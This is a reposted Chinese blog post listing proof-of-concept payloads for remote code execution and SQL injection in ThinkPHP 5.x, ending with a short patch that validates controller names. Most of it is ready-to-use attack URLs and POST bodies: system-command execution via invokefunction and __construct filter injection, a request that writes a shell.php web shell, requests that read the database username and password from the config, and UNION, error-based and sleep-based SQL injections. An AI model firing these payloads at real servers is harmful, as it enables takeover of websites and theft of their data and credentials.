Thinkphp V5.X 远程代码执行漏洞 - POC(搬运)
文章来源:lsh4ck's Blog
原文链接:
https://www.77169.com/html/237165.html
Thinkphp 5.0.22
-
http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
-
http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
-
http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
-
http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Thinkphp 5
-
http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
Thinkphp 5.0.21
-
http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
-
http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
Thinkphp 5.1.*
-
http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
-
http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
-
http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
-
http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
-
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
-
http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
-
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
-
http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
未知版本
-
?s=index/\think\module/action/param1/${@phpinfo()}
-
?s=index/\think\Module/Action/Param/${@phpinfo()}
-
?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
-
index.php?s=/home/article/view_recent/name/1'
-
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
-
index.php?s=/home/shopcart/getPricetotal/tag/1%27
-
index.php?s=/home/shopcart/getpriceNum/id/1%27
-
index.php?s=/home/user/cut/id/1%27
-
index.php?s=/home/service/index/id/1%27
-
index.php?s=/home/pay/chongzhi/orderid/1%27
-
index.php?s=/home/pay/index/orderid/1%27
-
index.php?s=/home/order/complete/id/1%27
-
index.php?s=/home/order/complete/id/1%27
-
index.php?s=/home/order/detail/id/1%27
-
index.php?s=/home/order/cancel/id/1%27
-
index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
-
POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"1') union select sleep('''+str(sleep_time)+''')#
Thinkphp 5.0.23(完整版)Debug 模式
(post)public/index.php
(data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx
Thinkphp 5.0.23(完整版)
(post)public/index.php?s=captcha
(data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al
Thinkphp 5.0.10(完整版)
(post url)public/index.php?s=index/index/index
(data)s=whoami&_method=__construct&method&filter[]=system
Thinkphp 5.1.* 和 5.2.* 和 5.0.*
(post url)public/index.php
(data)c=exec&f=calc.exe&_method=filter
当 Php7 以上无法使用 Assert 的时候用
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=包含&x=phpinfo();
有上传图片或者日志用这个包含就可以
最后提一句 TP6 有可能有任意文件上传漏洞。
修复Thinkphp框架5.0和5.1版本的远程代码执行安全漏洞
5.0版本
thinkphp/library/think/App.php 类的module方法的获取控制器的代码后面加上
if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
throw new HttpException(404, 'controller not exists:' . $controller);
}
5.1版本
thinkphp/library/think/route/dispatch/Url.php 类的parseUrl方法,解析控制器后加上 添加
if ($controller && !preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
throw new HttpException(404, 'controller not exists:' . $controller);
}
